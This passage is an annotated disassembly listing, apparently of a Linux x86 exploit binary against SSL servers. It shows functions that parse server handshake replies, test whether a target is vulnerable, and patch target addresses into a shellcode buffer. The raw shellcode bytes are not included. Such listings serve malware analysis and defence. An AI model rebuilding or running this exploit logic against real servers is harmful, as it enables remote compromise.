0804b358 <get_server_finished+0x10c> mov    0xffffbff4(%ebp),%eax
0804b35e <get_server_finished+0x112> dec    %eax
0804b35f <get_server_finished+0x113> push   %eax

Possible reference to string:
"get_server_finished: Session data too short (%d bytes)"

0804b360 <get_server_finished+0x114> push   $0x804ce00
0804b365 <get_server_finished+0x119> mov    0x8(%ebp),%eax
0804b368 <get_server_finished+0x11c> sub    $0xffffff80,%eax
0804b36b <get_server_finished+0x11f> push   %eax
0804b36c <get_server_finished+0x120> call   08048e6c <_init+0x2d8>
0804b371 <get_server_finished+0x125> add    $0x10,%esp
0804b374 <get_server_finished+0x128> mov    $0x0,%eax
0804b379 <get_server_finished+0x12d> jmp    0804b3df <get_server_finished+0x193>
0804b37b <get_server_finished+0x12f> nop    

Referenced from jump at 0804b349 ; 

0804b37c <get_server_finished+0x130> mov    0xffffbff4(%ebp),%eax
0804b382 <get_server_finished+0x136> dec    %eax
0804b383 <get_server_finished+0x137> cmp    0x10(%ebp),%eax
0804b386 <get_server_finished+0x13a> jle    0804b3b8 <get_server_finished+0x16c>
0804b388 <get_server_finished+0x13c> mov    0x8(%ebp),%eax
0804b38b <get_server_finished+0x13f> movl   $0x2,0x7c(%eax)
0804b392 <get_server_finished+0x146> sub    $0x4,%esp
0804b395 <get_server_finished+0x149> mov    0xffffbff4(%ebp),%eax
0804b39b <get_server_finished+0x14f> dec    %eax
0804b39c <get_server_finished+0x150> push   %eax

Possible reference to string:
"get_server_finished: Session data too long (%d bytes)"

0804b39d <get_server_finished+0x151> push   $0x804ce40
0804b3a2 <get_server_finished+0x156> mov    0x8(%ebp),%eax
0804b3a5 <get_server_finished+0x159> sub    $0xffffff80,%eax
0804b3a8 <get_server_finished+0x15c> push   %eax
0804b3a9 <get_server_finished+0x15d> call   08048e6c <_init+0x2d8>
0804b3ae <get_server_finished+0x162> add    $0x10,%esp
0804b3b1 <get_server_finished+0x165> mov    $0x0,%eax
0804b3b6 <get_server_finished+0x16a> jmp    0804b3df <get_server_finished+0x193>

Referenced from jump at 0804b386 ; 

0804b3b8 <get_server_finished+0x16c> sub    $0x4,%esp
0804b3bb <get_server_finished+0x16f> mov    0xffffbff4(%ebp),%eax
0804b3c1 <get_server_finished+0x175> dec    %eax
0804b3c2 <get_server_finished+0x176> push   %eax
0804b3c3 <get_server_finished+0x177> lea    0xffffbff8(%ebp),%eax
0804b3c9 <get_server_finished+0x17d> inc    %eax
0804b3ca <get_server_finished+0x17e> push   %eax
0804b3cb <get_server_finished+0x17f> pushl  0xc(%ebp)
0804b3ce <get_server_finished+0x182> call   08048d9c <_init+0x208>
0804b3d3 <get_server_finished+0x187> add    $0x10,%esp

Referenced from jump at 0804b33c ; 

0804b3d6 <get_server_finished+0x18a> mov    0xffffbff4(%ebp),%eax
0804b3dc <get_server_finished+0x190> dec    %eax
0804b3dd <get_server_finished+0x191> mov    %eax,%eax

Referenced from jump at 0804b263 ; 0804b2f5 ; 0804b333 ; 0804b379 ; 0804b3b6 ; 

0804b3df <get_server_finished+0x193> leave  
0804b3e0 <get_server_finished+0x194> ret    
0804b3e1 <get_server_finished+0x195> lea    0x0(%esi),%esi

---- Function : get_server_error ----

Referenced from call at 08049530 ; 

0804b3e4 <get_server_error> push   %ebp
0804b3e5 <get_server_error+0x1> mov    %esp,%ebp
0804b3e7 <get_server_error+0x3> sub    $0x4018,%esp
0804b3ed <get_server_error+0x9> mov    0x8(%ebp),%eax
0804b3f0 <get_server_error+0xc> cmpl   $0x0,0x7c(%eax)
0804b3f4 <get_server_error+0x10> je     0804b400 <get_server_error+0x1c>
0804b3f6 <get_server_error+0x12> mov    $0x0,%eax
0804b3fb <get_server_error+0x17> jmp    0804b45c <get_server_error+0x78>
0804b3fd <get_server_error+0x19> lea    0x0(%esi),%esi

Referenced from jump at 0804b3f4 ; 

0804b400 <get_server_error+0x1c> mov    0x8(%ebp),%eax
0804b403 <get_server_error+0x1f> cmpl   $0x0,0x78(%eax)
0804b407 <get_server_error+0x23> je     0804b419 <get_server_error+0x35>
0804b409 <get_server_error+0x25> sub    $0xc,%esp

Possible reference to string:
" -> get_server_error"

0804b40c <get_server_error+0x28> push   $0x804ce76
0804b411 <get_server_error+0x2d> call   08048d8c <_init+0x1f8>
0804b416 <get_server_error+0x32> add    $0x10,%esp

Referenced from jump at 0804b407 ; 

0804b419 <get_server_error+0x35> sub    $0x4,%esp
0804b41c <get_server_error+0x38> push   $0x4000
0804b421 <get_server_error+0x3d> lea    0xffffbff8(%ebp),%eax
0804b427 <get_server_error+0x43> push   %eax
0804b428 <get_server_error+0x44> pushl  0x8(%ebp)
0804b42b <get_server_error+0x47> call   0804a2bc <read_ssl_packet>
0804b430 <get_server_error+0x4c> add    $0x10,%esp
0804b433 <get_server_error+0x4f> mov    %eax,%eax
0804b435 <get_server_error+0x51> mov    %eax,0xffffbff4(%ebp)
0804b43b <get_server_error+0x57> cmpl   $0x0,0xffffbff4(%ebp)
0804b442 <get_server_error+0x5e> jne    0804b457 <get_server_error+0x73>
0804b444 <get_server_error+0x60> mov    0x8(%ebp),%eax
0804b447 <get_server_error+0x63> cmpl   $0x3,0x7c(%eax)
0804b44b <get_server_error+0x67> jne    0804b457 <get_server_error+0x73>
0804b44d <get_server_error+0x69> mov    0x8(%ebp),%eax
0804b450 <get_server_error+0x6c> movl   $0x0,0x7c(%eax)

Referenced from jump at 0804b442 ; 0804b44b ; 

0804b457 <get_server_error+0x73> mov    $0x1,%eax

Referenced from jump at 0804b3fb ; 

0804b45c <get_server_error+0x78> leave  
0804b45d <get_server_error+0x79> ret    
0804b45e <get_server_error+0x7a> mov    %esi,%esi

---- Function : get_cipher_linux_x86 ----
0804b460 <get_cipher_linux_x86> push   %ebp
0804b461 <get_cipher_linux_x86+0x1> mov    %esp,%ebp
0804b463 <get_cipher_linux_x86+0x3> sub    $0x8,%esp
0804b466 <get_cipher_linux_x86+0x6> cmpl   $0x6f,0xc(%ebp)
0804b46a <get_cipher_linux_x86+0xa> jg     0804b488 <get_cipher_linux_x86+0x28>
0804b46c <get_cipher_linux_x86+0xc> sub    $0xc,%esp

Possible reference to string:
"This server is not vulnerable to the attack."

0804b46f <get_cipher_linux_x86+0xf> push   $0x804cf40
0804b474 <get_cipher_linux_x86+0x14> call   08048d8c <_init+0x1f8>
0804b479 <get_cipher_linux_x86+0x19> add    $0x10,%esp
0804b47c <get_cipher_linux_x86+0x1c> sub    $0xc,%esp
0804b47f <get_cipher_linux_x86+0x1f> push   $0x1
0804b481 <get_cipher_linux_x86+0x21> call   08048dfc <_init+0x268>
0804b486 <get_cipher_linux_x86+0x26> mov    %esi,%esi

Referenced from jump at 0804b46a ; 

0804b488 <get_cipher_linux_x86+0x28> mov    0x8(%ebp),%eax
0804b48b <get_cipher_linux_x86+0x2b> add    $0x67,%eax
0804b48e <get_cipher_linux_x86+0x2e> movzbl (%eax),%eax
0804b491 <get_cipher_linux_x86+0x31> mov    %eax,%edx
0804b493 <get_cipher_linux_x86+0x33> shl    $0x18,%edx
0804b496 <get_cipher_linux_x86+0x36> mov    0x8(%ebp),%eax
0804b499 <get_cipher_linux_x86+0x39> add    $0x66,%eax
0804b49c <get_cipher_linux_x86+0x3c> movzbl (%eax),%eax
0804b49f <get_cipher_linux_x86+0x3f> shl    $0x10,%eax
0804b4a2 <get_cipher_linux_x86+0x42> or     %eax,%edx
0804b4a4 <get_cipher_linux_x86+0x44> mov    0x8(%ebp),%eax
0804b4a7 <get_cipher_linux_x86+0x47> add    $0x65,%eax
0804b4aa <get_cipher_linux_x86+0x4a> movzbl (%eax),%eax
0804b4ad <get_cipher_linux_x86+0x4d> shl    $0x8,%eax
0804b4b0 <get_cipher_linux_x86+0x50> or     %eax,%edx
0804b4b2 <get_cipher_linux_x86+0x52> mov    0x8(%ebp),%eax
0804b4b5 <get_cipher_linux_x86+0x55> add    $0x64,%eax
0804b4b8 <get_cipher_linux_x86+0x58> movzbl (%eax),%eax
0804b4bb <get_cipher_linux_x86+0x5b> or     %edx,%eax
0804b4bd <get_cipher_linux_x86+0x5d> mov    %eax,0xfffffffc(%ebp)
0804b4c0 <get_cipher_linux_x86+0x60> mov    0xfffffffc(%ebp),%eax
0804b4c3 <get_cipher_linux_x86+0x63> mov    %eax,%eax
0804b4c5 <get_cipher_linux_x86+0x65> leave  
0804b4c6 <get_cipher_linux_x86+0x66> ret    
0804b4c7 <get_cipher_linux_x86+0x67> nop    

---- Function : get_ciphers_linux_x86 ----
0804b4c8 <get_ciphers_linux_x86> push   %ebp
0804b4c9 <get_ciphers_linux_x86+0x1> mov    %esp,%ebp
0804b4cb <get_ciphers_linux_x86+0x3> sub    $0x8,%esp
0804b4ce <get_ciphers_linux_x86+0x6> cmpl   $0x6f,0xc(%ebp)
0804b4d2 <get_ciphers_linux_x86+0xa> jg     0804b4f0 <get_ciphers_linux_x86+0x28>
0804b4d4 <get_ciphers_linux_x86+0xc> sub    $0xc,%esp

Possible reference to string:
"This server is not vulnerable to the attack."

0804b4d7 <get_ciphers_linux_x86+0xf> push   $0x804cf40
0804b4dc <get_ciphers_linux_x86+0x14> call   08048d8c <_init+0x1f8>
0804b4e1 <get_ciphers_linux_x86+0x19> add    $0x10,%esp
0804b4e4 <get_ciphers_linux_x86+0x1c> sub    $0xc,%esp
0804b4e7 <get_ciphers_linux_x86+0x1f> push   $0x1
0804b4e9 <get_ciphers_linux_x86+0x21> call   08048dfc <_init+0x268>
0804b4ee <get_ciphers_linux_x86+0x26> mov    %esi,%esi

Referenced from jump at 0804b4d2 ; 

0804b4f0 <get_ciphers_linux_x86+0x28> mov    0x8(%ebp),%eax
0804b4f3 <get_ciphers_linux_x86+0x2b> add    $0x6f,%eax
0804b4f6 <get_ciphers_linux_x86+0x2e> movzbl (%eax),%eax
0804b4f9 <get_ciphers_linux_x86+0x31> mov    %eax,%edx
0804b4fb <get_ciphers_linux_x86+0x33> shl    $0x18,%edx
0804b4fe <get_ciphers_linux_x86+0x36> mov    0x8(%ebp),%eax
0804b501 <get_ciphers_linux_x86+0x39> add    $0x6e,%eax
0804b504 <get_ciphers_linux_x86+0x3c> movzbl (%eax),%eax
0804b507 <get_ciphers_linux_x86+0x3f> shl    $0x10,%eax
0804b50a <get_ciphers_linux_x86+0x42> or     %eax,%edx
0804b50c <get_ciphers_linux_x86+0x44> mov    0x8(%ebp),%eax
0804b50f <get_ciphers_linux_x86+0x47> add    $0x6d,%eax
0804b512 <get_ciphers_linux_x86+0x4a> movzbl (%eax),%eax
0804b515 <get_ciphers_linux_x86+0x4d> shl    $0x8,%eax
0804b518 <get_ciphers_linux_x86+0x50> or     %eax,%edx
0804b51a <get_ciphers_linux_x86+0x52> mov    0x8(%ebp),%eax
0804b51d <get_ciphers_linux_x86+0x55> add    $0x6c,%eax
0804b520 <get_ciphers_linux_x86+0x58> movzbl (%eax),%eax
0804b523 <get_ciphers_linux_x86+0x5b> or     %edx,%eax
0804b525 <get_ciphers_linux_x86+0x5d> mov    %eax,0xfffffffc(%ebp)
0804b528 <get_ciphers_linux_x86+0x60> mov    0xfffffffc(%ebp),%eax
0804b52b <get_ciphers_linux_x86+0x63> mov    %eax,%eax
0804b52d <get_ciphers_linux_x86+0x65> leave  
0804b52e <get_ciphers_linux_x86+0x66> ret    
0804b52f <get_ciphers_linux_x86+0x67> nop    

---- Function : build_shellcode_linux_x86 ----
0804b530 <build_shellcode_linux_x86> push   %ebp
0804b531 <build_shellcode_linux_x86+0x1> mov    %esp,%ebp
0804b533 <build_shellcode_linux_x86+0x3> sub    $0x8,%esp
0804b536 <build_shellcode_linux_x86+0x6> sub    $0x4,%esp
0804b539 <build_shellcode_linux_x86+0x9> push   $0xd0
0804b53e <build_shellcode_linux_x86+0xe> push   $0x804e1e0
0804b543 <build_shellcode_linux_x86+0x13> pushl  0x8(%ebp)
0804b546 <build_shellcode_linux_x86+0x16> call   08048d9c <_init+0x208>
0804b54b <build_shellcode_linux_x86+0x1b> add    $0x10,%esp
0804b54e <build_shellcode_linux_x86+0x1e> sub    $0x4,%esp
0804b551 <build_shellcode_linux_x86+0x21> push   $0x41
0804b553 <build_shellcode_linux_x86+0x23> push   $0x804e100
0804b558 <build_shellcode_linux_x86+0x28> mov    0x8(%ebp),%eax
0804b55b <build_shellcode_linux_x86+0x2b> add    $0xd0,%eax
0804b560 <build_shellcode_linux_x86+0x30> push   %eax
0804b561 <build_shellcode_linux_x86+0x31> call   08048d9c <_init+0x208>
0804b566 <build_shellcode_linux_x86+0x36> add    $0x10,%esp
0804b569 <build_shellcode_linux_x86+0x39> mov    0x8(%ebp),%edx
0804b56c <build_shellcode_linux_x86+0x3c> add    $0x9f,%edx
0804b572 <build_shellcode_linux_x86+0x42> mov    0x14(%ebp),%eax
0804b575 <build_shellcode_linux_x86+0x45> shr    $0x18,%eax
0804b578 <build_shellcode_linux_x86+0x48> mov    %al,(%edx)
0804b57a <build_shellcode_linux_x86+0x4a> mov    (%edx),%cl
0804b57c <build_shellcode_linux_x86+0x4c> mov    0x8(%ebp),%edx
0804b57f <build_shellcode_linux_x86+0x4f> add    $0x9e,%edx
0804b585 <build_shellcode_linux_x86+0x55> mov    0x14(%ebp),%eax
0804b588 <build_shellcode_linux_x86+0x58> shr    $0x10,%eax
0804b58b <build_shellcode_linux_x86+0x5b> mov    %al,(%edx)
0804b58d <build_shellcode_linux_x86+0x5d> mov    (%edx),%al
0804b58f <build_shellcode_linux_x86+0x5f> or     %eax,%ecx
0804b591 <build_shellcode_linux_x86+0x61> mov    0x8(%ebp),%edx
0804b594 <build_shellcode_linux_x86+0x64> add    $0x9d,%edx
0804b59a <build_shellcode_linux_x86+0x6a> mov    0x14(%ebp),%eax
0804b59d <build_shellcode_linux_x86+0x6d> shr    $0x8,%eax
0804b5a0 <build_shellcode_linux_x86+0x70> mov    %al,(%edx)
0804b5a2 <build_shellcode_linux_x86+0x72> mov    (%edx),%al
0804b5a4 <build_shellcode_linux_x86+0x74> or     %eax,%ecx
0804b5a6 <build_shellcode_linux_x86+0x76> mov    0x8(%ebp),%edx
0804b5a9 <build_shellcode_linux_x86+0x79> add    $0x9c,%edx
0804b5af <build_shellcode_linux_x86+0x7f> mov    0x14(%ebp),%al
0804b5b2 <build_shellcode_linux_x86+0x82> mov    %al,(%edx)
0804b5b4 <build_shellcode_linux_x86+0x84> mov    (%edx),%al
0804b5b6 <build_shellcode_linux_x86+0x86> or     %ecx,%eax
0804b5b8 <build_shellcode_linux_x86+0x88> test   %al,%al
0804b5ba <build_shellcode_linux_x86+0x8a> mov    0x18(%ebp),%eax
0804b5bd <build_shellcode_linux_x86+0x8d> sub    $0xc0,%eax
0804b5c2 <build_shellcode_linux_x86+0x92> mov    %eax,0xfffffffc(%ebp)
0804b5c5 <build_shellcode_linux_x86+0x95> push   $0xd0
0804b5ca <build_shellcode_linux_x86+0x9a> pushl  0xfffffffc(%ebp)
0804b5cd <build_shellcode_linux_x86+0x9d> pushl  0x18(%ebp)

Possible reference to string:
"ciphers: 0x%x   start_addr: 0x%x   SHELLCODE_OFS: %d"

0804b5d0 <build_shellcode_linux_x86+0xa0> push   $0x804cf80
0804b5d5 <build_shellcode_linux_x86+0xa5> call   08048d8c <_init+0x1f8>
0804b5da <build_shellcode_linux_x86+0xaa> add    $0x10,%esp
0804b5dd <build_shellcode_linux_x86+0xad> mov    0x8(%ebp),%edx
0804b5e0 <build_shellcode_linux_x86+0xb0> add    $0xc3,%edx
0804b5e6 <build_shellcode_linux_x86+0xb6> mov    0x1c(%ebp),%eax
0804b5e9 <build_shellcode_linux_x86+0xb9> sub    $0xc,%eax
0804b5ec <build_shellcode_linux_x86+0xbc> shr    $0x18,%eax
0804b5ef <build_shellcode_linux_x86+0xbf> mov    %al,(%edx)
0804b5f1 <build_shellcode_linux_x86+0xc1> mov    (%edx),%cl
0804b5f3 <build_shellcode_linux_x86+0xc3> mov    0x8(%ebp),%edx
0804b5f6 <build_shellcode_linux_x86+0xc6> add    $0xc2,%edx
0804b5fc <build_shellcode_linux_x86+0xcc> mov    0x1c(%ebp),%eax
0804b5ff <build_shellcode_linux_x86+0xcf> sub    $0xc,%eax
0804b602 <build_shellcode_linux_x86+0xd2> shr    $0x10,%eax
0804b605 <build_shellcode_linux_x86+0xd5> mov    %al,(%edx)
0804b607 <build_shellcode_linux_x86+0xd7> mov    (%edx),%al
0804b609 <build_shellcode_linux_x86+0xd9> or     %eax,%ecx
0804b60b <build_shellcode_linux_x86+0xdb> mov    0x8(%ebp),%edx
0804b60e <build_shellcode_linux_x86+0xde> add    $0xc1,%edx
0804b614 <build_shellcode_linux_x86+0xe4> mov    0x1c(%ebp),%eax
0804b617 <build_shellcode_linux_x86+0xe7> sub    $0xc,%eax
0804b61a <build_shellcode_linux_x86+0xea> shr    $0x8,%eax
0804b61d <build_shellcode_linux_x86+0xed> mov    %al,(%edx)
0804b61f <build_shellcode_linux_x86+0xef> mov    (%edx),%al
0804b621 <build_shellcode_linux_x86+0xf1> or     %eax,%ecx
0804b623 <build_shellcode_linux_x86+0xf3> mov    0x8(%ebp),%edx
0804b626 <build_shellcode_linux_x86+0xf6> add    $0xc0,%edx
0804b62c <build_shellcode_linux_x86+0xfc> mov    0x1c(%ebp),%al
0804b62f <build_shellcode_linux_x86+0xff> sub    $0xc,%eax
0804b632 <build_shellcode_linux_x86+0x102> mov    %al,(%edx)
0804b634 <build_shellcode_linux_x86+0x104> mov    (%edx),%al
0804b636 <build_shellcode_linux_x86+0x106> or     %ecx,%eax
0804b638 <build_shellcode_linux_x86+0x108> test   %al,%al
0804b63a <build_shellcode_linux_x86+0x10a> mov    0x8(%ebp),%edx
0804b63d <build_shellcode_linux_x86+0x10d> add    $0xc7,%edx
0804b643 <build_shellcode_linux_x86+0x113> mov    0xfffffffc(%ebp),%eax
0804b646 <build_shellcode_linux_x86+0x116> add    $0xd0,%eax
0804b64b <build_shellcode_linux_x86+0x11b> shr    $0x18,%eax
0804b64e <build_shellcode_linux_x86+0x11e> mov    %al,(%edx)
0804b650 <build_shellcode_linux_x86+0x120> mov    (%edx),%cl
0804b652 <build_shellcode_linux_x86+0x122> mov    0x8(%ebp),%edx
0804b655 <build_shellcode_linux_x86+0x125> add    $0xc6,%edx
0804b65b <build_shellcode_linux_x86+0x12b> mov    0xfffffffc(%ebp),%eax
0804b65e <build_shellcode_linux_x86+0x12e> add    $0xd0,%eax
0804b663 <build_shellcode_linux_x86+0x133> shr    $0x10,%eax
0804b666 <build_shellcode_linux_x86+0x136> mov    %al,(%edx)
0804b668 <build_shellcode_linux_x86+0x138> mov    (%edx),%al
0804b66a <build_shellcode_linux_x86+0x13a> or     %eax,%ecx
0804b66c <build_shellcode_linux_x86+0x13c> mov    0x8(%ebp),%edx
0804b66f <build_shellcode_linux_x86+0x13f> add    $0xc5,%edx
0804b675 <build_shellcode_linux_x86+0x145> mov    0xfffffffc(%ebp),%eax
0804b678 <build_shellcode_linux_x86+0x148> add    $0xd0,%eax
0804b67d <build_shellcode_linux_x86+0x14d> shr    $0x8,%eax
0804b680 <build_shellcode_linux_x86+0x150> mov    %al,(%edx)
0804b682 <build_shellcode_linux_x86+0x152> mov    (%edx),%al
0804b684 <build_shellcode_linux_x86+0x154> or     %eax,%ecx
0804b686 <build_shellcode_linux_x86+0x156> mov    0x8(%ebp),%edx
0804b689 <build_shellcode_linux_x86+0x159> add    $0xc4,%edx
0804b68f <build_shellcode_linux_x86+0x15f> mov    0xfffffffc(%ebp),%al
0804b692 <build_shellcode_linux_x86+0x162> add    $0xd0,%eax
0804b697 <build_shellcode_linux_x86+0x167> mov    %al,(%edx)
0804b699 <build_shellcode_linux_x86+0x169> mov    (%edx),%al
0804b69b <build_shellcode_linux_x86+0x16b> or     %ecx,%eax
0804b69d <build_shellcode_linux_x86+0x16d> test   %al,%al
0804b69f <build_shellcode_linux_x86+0x16f> mov    $0x111,%eax
0804b6a4 <build_shellcode_linux_x86+0x174> leave  
0804b6a5 <build_shellcode_linux_x86+0x175> ret    
0804b6a6 <build_shellcode_linux_x86+0x176> mov    %esi,%esi
0804b6a8 <build_shellcode_linux_x86+0x178> nop    
0804b6a9 <build_shellcode_linux_x86+0x179> nop    
0804b6aa <build_shellcode_linux_x86+0x17a> nop    
0804b6ab <build_shellcode_linux_x86+0x17b> nop    
0804b6ac <build_shellcode_linux_x86+0x17c> nop    
0804b6ad <build_shellcode_linux_x86+0x17d> nop    
0804b6ae <build_shellcode_linux_x86+0x17e> nop    
0804b6af <build_shellcode_linux_x86+0x17f> nop    

---- Function : __do_global_ctors_aux ----
0804b6b0 <__do_global_ctors_aux> push   %ebp
0804b6b1 <__do_global_ctors_aux+0x1> mov    %esp,%ebp
0804b6b3 <__do_global_ctors_aux+0x3> push   %ebx
0804b6b4 <__do_global_ctors_aux+0x4> sub    $0x4,%esp
0804b6b7 <__do_global_ctors_aux+0x7> mov    0x804e304,%eax
0804b6bc <__do_global_ctors_aux+0xc> mov    $0x804e304,%ebx
0804b6c1 <__do_global_ctors_aux+0x11> cmp    $0xffffffff,%eax
0804b6c4 <__do_global_ctors_aux+0x14> je     0804b6dc <__do_global_ctors_aux+0x2c>
0804b6c6 <__do_global_ctors_aux+0x16> lea    0x0(%esi),%esi
0804b6c9 <__do_global_ctors_aux+0x19> lea    0x0(%edi,1),%edi

Referenced from jump at 0804b6da ; 

0804b6d0 <__do_global_ctors_aux+0x20> sub    $0x4,%ebx
0804b6d3 <__do_global_ctors_aux+0x23> call   *%eax
0804b6d5 <__do_global_ctors_aux+0x25> mov    (%ebx),%eax
0804b6d7 <__do_global_ctors_aux+0x27> cmp    $0xffffffff,%eax
0804b6da <__do_global_ctors_aux+0x2a> jne    0804b6d0 <__do_global_ctors_aux+0x20>

Referenced from jump at 0804b6c4 ; 

0804b6dc <__do_global_ctors_aux+0x2c> pop    %eax
0804b6dd <__do_global_ctors_aux+0x2d> pop    %ebx
0804b6de <__do_global_ctors_aux+0x2e> pop    %ebp
0804b6df <__do_global_ctors_aux+0x2f> ret    

---- Function : init_dummy ----
0804b6e0 <init_dummy> push   %ebp
0804b6e1 <init_dummy+0x1> mov    %esp,%ebp
0804b6e3 <init_dummy+0x3> sub    $0x8,%esp
0804b6e6 <init_dummy+0x6> mov    %ebp,%esp
0804b6e8 <init_dummy+0x8> pop    %ebp
0804b6e9 <init_dummy+0x9> ret    
0804b6ea <init_dummy+0xa> lea    0x0(%esi),%esi
Disassembly of section .fini:

---- Function : _fini ----
0804b6f0 <_fini> push   %ebp
0804b6f1 <_fini+0x1> mov    %esp,%ebp
0804b6f3 <_fini+0x3> push   %ebx
0804b6f4 <_fini+0x4> push   %edx
0804b6f5 <_fini+0x5> call   0804b6fa <gcc2_compiled.+0xa>

Referenced from call at 0804b6f5 ; 

0804b6fa <_fini+0xa> pop    %ebx
0804b6fb <_fini+0xb> add    $0x2c1a,%ebx
0804b701 <_fini+0x11> lea    0x0(%esi),%esi
0804b704 <_fini+0x14> call   08048f30 <__do_global_dtors_aux>
0804b709 <_fini+0x19> mov    0xfffffffc(%ebp),%ebx
0804b70c <_fini+0x1c> leave  
0804b70d <_fini+0x1d> ret